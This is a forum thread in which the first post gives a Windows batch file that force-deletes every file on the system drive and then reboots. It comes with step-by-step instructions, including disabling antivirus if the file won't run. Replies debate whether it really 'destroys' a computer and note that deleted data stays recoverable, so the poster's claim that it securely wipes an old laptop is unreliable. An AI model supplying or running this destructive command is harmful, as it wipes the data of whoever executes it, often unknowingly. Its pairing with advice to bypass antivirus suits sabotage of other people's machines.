Phiction

Enthusiast
Reaction score
Sin$
WARNING DO NOT DO THIS TO ANY COMPUTER YOU DO NOT WISH TO DESTROY
I AM NOT RESPONSIBLE FOR ANY DAMAGE YOU DO TO ANYONE'S COMPUTER

How To Do:
1)
Open Up Notepad (Start/All Programs/ Accessories/ Notepad)
2)
Copy And Paste This Code Into Notepad

Code:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

3)
On NotePad : Goto File, Save As, Save it anywhere, Name The File : (whatever).bat, .bat stands for batch.
4)
Locate the File Wherever You Saved It, And Open It. (If It Doesn't Open, Or Is Not There, Turn Off Your Anti Virus.)
5)
A Cmd Window Should Pop Up Let It Run To The End, And After Its Done Restart Your Computer. And Thats It.

AGAIN DONT DO THIS TO ANY COMPUTER THATS NOT YOURS OR YOU DONT WANT IT BROKEN~!

GoldBl4d3

GoldBl4d3

VIP
VIP
Retired
Programmer Mythical Veteran Legendary Veteran
Reaction score
Sin$
Kinda pointless! No one would do it, nor do they have a purpose to do it.

Phiction

Phiction

Enthusiast
Reaction score
Sin$
Kinda pointless! No one would do it, nor do they have a purpose to do it.
Well, Ive used it once on my old computer. It just deletes your harddrive. I mean say you have an old laptop, and you dont want anyone to see your stuff, just use this, and then throw it away. :tongue:

GoldBl4d3

GoldBl4d3

VIP
VIP
Retired
Reaction score
Sin$
Well, Ive used it once on my old computer. It just deletes your harddrive. I mean say you have an old laptop, and you dont want anyone to see your stuff, just use this, and then throw it away. :tongue:

I guess. But if I ever get rid of my laptop. I will be sure to pull the HDD and memory out of it for keeps.

Fire30

Fire30

Seasoned Member
Reaction score
Sin$

If you think people can't get all your data because of this batchfile you are sorely mistaken.

GoldBl4d3

GoldBl4d3

VIP
VIP
Retired
Reaction score
Sin$
Damn I was just about to say you can recover your hdd data. In fact I have an app to do so for when I accidentally delete something.

Zorg93

NayJames123

Read Art
Fabled Veteran Modder Programmer
Reaction score
Sin$
think you would need something to fully format your harddrive instead, all this does is make the drive think there isnt any data located the sectors that used to have all the files, so programs can still look inside and see the plain data and work with that.
and this doesnt destroy a computer, it just means you'll need to restore it from a backup partition or a recovery disc

GoldBl4d3

GoldBl4d3

VIP
VIP
Retired
Reaction score
Sin$
think you would need something to fully format your harddrive instead, all this does is make the drive think there isnt any data located the sectors that used to have all the files, so programs can still look inside and see the plain data and work with that.
and this doesnt destroy a computer, it just means you'll need to restore it from a backup partition or a recovery disc

im pretty sure by destroy he meant just ruin someones day by deleting the hdd

Zorg93

NayJames123

Read Art
Fabled Veteran Modder Programmer
Reaction score
Sin$
im pretty sure by destroy he meant just ruin someones day by deleting the hdd
yeah, unless you create code that can somehow alter the bios and overclock the cpu etc, i doubt you could destroy a computer using batch files

Phiction

Phiction

Enthusiast
Reaction score
Sin$
yeah, unless you create code that can somehow alter the bios and overclock the cpu etc, i doubt you could destroy a computer using batch files
Well if im correct about this, is once the CPU hits a High enough TEMP, it turns off the computer, so it wont damage the CPU. But that might not be the case for older computers.

Top Bottom
Login
Register